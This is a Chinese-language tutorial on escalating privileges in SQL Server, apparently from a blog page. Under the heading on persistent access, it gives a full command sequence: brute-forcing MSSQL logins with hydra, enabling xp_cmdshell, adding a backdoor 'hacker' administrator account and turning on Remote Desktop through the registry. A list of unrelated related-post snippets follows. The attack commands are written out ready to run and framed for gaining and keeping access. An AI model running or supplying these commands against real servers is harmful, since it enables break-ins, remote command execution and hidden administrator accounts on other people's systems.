SQLServer数据库漏洞
一、SQLServer数据库提权前提条件:
1.以管理员身份运行数据库服务
2.已经获得SQL数据库的sysadmin权限
3.可以连接数据库
二、通过存储过程进行提权
hydra工具介绍:
-L:指定用户名字典
-P:指定密码字典
-vV:输出破解到的用户名与密码
-e:ns ,n空密码;s使用密码
语法: hydra -L user.txt -P pwd.txt -vV -e ns 192.168.239.130 mssql
案例: 暴力破解MSSQL的用户名与密码:
hydra -L ./User_name/username.txt -P ./User_password/密码.txt
-vV -e ns 192.168.239.130 mssql
MSSQL的存储过程介绍:
存储过程就是在服务端书写好对应的函数功能并命名,当客户端调用该存储过程时,只需要调用其名称即可。exec 存储过程名称
MSSQL提权的关键是利用xp-cmdshell这个存储过程。默认该存储过程是不能被调用的。
开启xp_cmdshell存储过程:
exec sp_configure 'show advanced options', 1
reconfigure
exec sp_configure ‘xp_cmdshell’, 1
reconfigure
到此提权完毕!
验证提权结果:
关闭xp_cmdshell存储过程:
exec sp_configure ‘xp_cmdshell’, 0
reconfigure
exec sp_configure 'show advanced options', 0
reconfigure
利用MSSQL提权后的持续访问:
修改远程登录桌面的设置,实现远程访问数据库服务器。
1)exec xp_cmdshell 'net user hacker 123.com /add'
2)exec xp_cmdshell 'net localgroup administrators hacker /add'
3)打开远程桌面:
exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
4)使用黑客机连接数据库服务器
SQLServer数据库漏洞相关推荐
- sql+php修改mysql结构,MSSQL_修改SQL-SERVER数据库表结构的SQL命令附sql命令行修改数据库,具体不废话了,请看下文代码 - phpStudy...
修改SQL-SERVER数据库表结构的SQL命令附sql命令行修改数据库 具体不废话了,请看下文代码详细说明吧. 向表中增加一个 varchar 列: ALTER TABLE distributors ...
- java 清空控制台_利用原生库和JNI(Java原生接口)实现H2数据库漏洞利用
在H2数据库引擎中获取代码执行权限的技术早已是众所周知,但有个要求就是H2能够动态编译Java代码.而本文将向大家展示以前没有公开过的利用H2的方法,并且无需使用Java编译器,即通过原生库和JNI( ...
- 在SQLserver数据库里设置作业的步骤
在SQLserver数据库里设置作业(对数据库的表定期进行数据清理)的步骤 1.首先,要打开sql server代理的服务,在我的电脑,右键管理的服务打开,SQL Server 代理 (MSSQLSE ...
- 获取SQLServer数据库中所有表
对于获取SQLSERVER数据库中所有表,首先第一步引有SQLDMO.dll 找到文件路径: C:\Program Files\Microsoft SQL Server\80\Tools\ ...
- nodejs操作sqlserver数据_pyspark操作MySQL、SQLServer数据库进行数据处理操作
欢迎访问本人的CSDN博客[Together_CZ],我是沂水寒城. https://yishuihancheng.blog.csdn.net 在大数据处理领域里面,Hadoop和spark可以说是最 ...
- sqlserver在linux数据备份,SQLServer数据库之sqlserver for linux自动备份数据库脚本
本文主要向大家介绍了SQLServer数据库之sqlserver for linux自动备份数据库脚本,通过具体的内容向大家展现,希望对大家学习SQLServer数据库有所帮助. 不多说直接上脚本 # ...
- 简单的3个SQL视图搞定所有SqlServer数据库字典
此文系转载,并非本人原创. 网上有很多SQL SERVER数据库字典的SQL语句,七零八落,我在工作整理了一下思路,总结SQL代码如下.数据库字典包括表结构(分2K和2005).索引和主键.外键.约束 ...
- SqlServer 数据库 建立子账号
2019独角兽企业重金招聘Python工程师标准>>> 打开sqlServer数据库 点击安全性,点击登录名,可以看到现在数据库的所有子账号,右击登录名,点击新建登录名 创建登录 ...
- c语言 mysql_bind,C语言连接SQLSERVER数据库
第一步:配置ODBC.在配置ODBC时有用户DSN.系统DSN.和文件DSN三种方法,为了稳妥起见,采用系统DSN. DSN的名字叫LocalServer,帐号:sa,密码123456 第二步:打开V ...
最新文章
- OSPF末节和完全末节实验
- css :hover
- 遍历list、set、map和array
- 【洛谷 P4168】[Violet]蒲公英(分块)
- JDK14的新特性:JFR,JMC和JFR事件流
- Ehab and Path-etic MEXs CodeForces - 1325C(思维+贪心)
- php内容缓存输出,PHP使用缓存即时输出内容(output buffering)的方法
- caffe 日志保存以及matlab绘制方法(windows以及ubuntu下)
- 用FBI通缉犯照片集,考验亚马逊人脸识别,意外发现了隐情
- (转)问题: Oracle Database 10g 未在当前操作系统中经过认证
- Git:git合并分支
- 堪萨斯州立大学计算机科学,堪萨斯州立大学有哪些专业?
- 网易企业邮箱:与POP3、WebMail相比,为什么Imap4更被接受
- 七层代理与四层代理区别
- 企鹅吞狗,狗走狐悲,狼厂危矣
- C#控制方块的移动windows
- Vue 的最大的优势是什么?
- 淘宝api接口系列,获取sku详细信息
- 阿里云计算ACA认证攻略
- 家庭收支记账软件--Java
热门文章
- 同步电路出现异步清零可以吗_异步清零和同步清零置数区别
- WordPress爱导航主题 1.1.3 简约大气网站导航源码网址导航源码
- Cypher语句总结
- 爬取猫眼电影TOP100榜单
- USB2.0端口设备静电防护方案设计压敏电阻或TVS管
- 突然断电对oracle的影响,Oracle数据库之由于突然断电造成oracle数据库的部分clob字段值变为(损毁)...
- 【ML特征工程】第 2 章 :简单数字的花式技巧
- CreateEvent例子
- 小猪博客(猪窝) -- 关注新鲜、有趣、不可思议的事物
- PMP计算(带例题)